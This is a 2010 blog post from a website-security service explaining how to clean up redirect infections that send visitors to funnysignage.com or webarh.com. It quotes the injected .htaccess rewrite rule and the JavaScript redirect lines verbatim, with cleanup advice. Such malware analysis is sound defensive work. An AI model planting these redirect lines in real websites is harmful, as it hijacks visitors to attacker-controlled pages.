Funnysignage.com and webarh.com website infections

Since this past weekend, 10-9-2010, we’ve been getting many requests from website owners who have had their websites infected with code that redirects visitors to either funnysignage.com or webarh.com. This blog post will show how to clean websites infected with the funnysignage.com or webarh.com redirects.

We’ve cleaned infected websites on Windows servers as well as infected websites on Linux servers and they’ve all been basically the same.

Inside of every folder there is a file named .htaccess. Yes even on Windows. It doesn’t work on websites based on Windows servers, but it’s there. The file contents look like this:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://funnysignage.com/r.php

For those of you who are infected with the webarh.com redirect, your file contents will look similar, just replace funnysignage.com with webarh.com.

Look in all folders for this file, open the file and if the contents look like above, then delete the file.

You might also find that the index.html files have been replaced, or in some instances, there is an index.html file added to each folder on the website. In any case, you’ll probably find this code somewhere in the index.html file:

(opening script tag)document. location. href='http://funnysignage. com/r.php';(closing script tag)(opening script tag)document. location. href='http://funnysignage. com/r.php';(closing script tag)

You’re reading that correctly. It usually appears twice – and it’s usually at the bottom of the file, outside the closing html tag. Again, for those who have websites infected with the webarh.com redirect, just replace funnysignage.com with webarh.com and that’s what you’ll probably see inside your index.html files.

In many of these website infections, inside the index.php files, they will have been replaced. The contents of the index.php file is nothing more than:

(opening script tag)document.location.href='http://funnysignage.com/r.php';(closing script tag)

Removing the above, will stop your website from redirecting, however, the clean-up isn’t over. In the majority of the cases with the funnysignage.com or webarh.com redirects, we’re also seeing many backdoors placed on the infected websites.

Unfortunately, there is no common strings to search for when looking for backdoors – but, you must find them and delete, otherwise the next website infection will surely find your site as victim.

If you have a known, good back-up of your website, you may want to consider deleting your entire site and restoring from back-up. Please verify that the back-up is not infected.

In cleaning up from this infection, you’ll have to remove many, many files and as stated above, often times, the legitimate files are replaced with nothing more than the above redirect code, so restoring from back-up may just be your only choice.

If this infection starts infecting websites hosted at certain hosting providers and somebody starts blaming a particular large hosting provider(s), don’t believe it. We’ve already seen this infection across many, many different hosting providers and some sites that are on their dedicated server. Please do not think that changing hosting providers will solve this issue.

As best we can tell, the only common factors in the funnysignage.com or webarh.com infections is either the site is running on PHP 4.X, or the website owner, developer, author or someone who has FTP access to the infected website, has a virus that has stolen the FTP credentials.

If you need help in cleaning your website from this, please contact me at: traef@wewatchyourwebsite.com.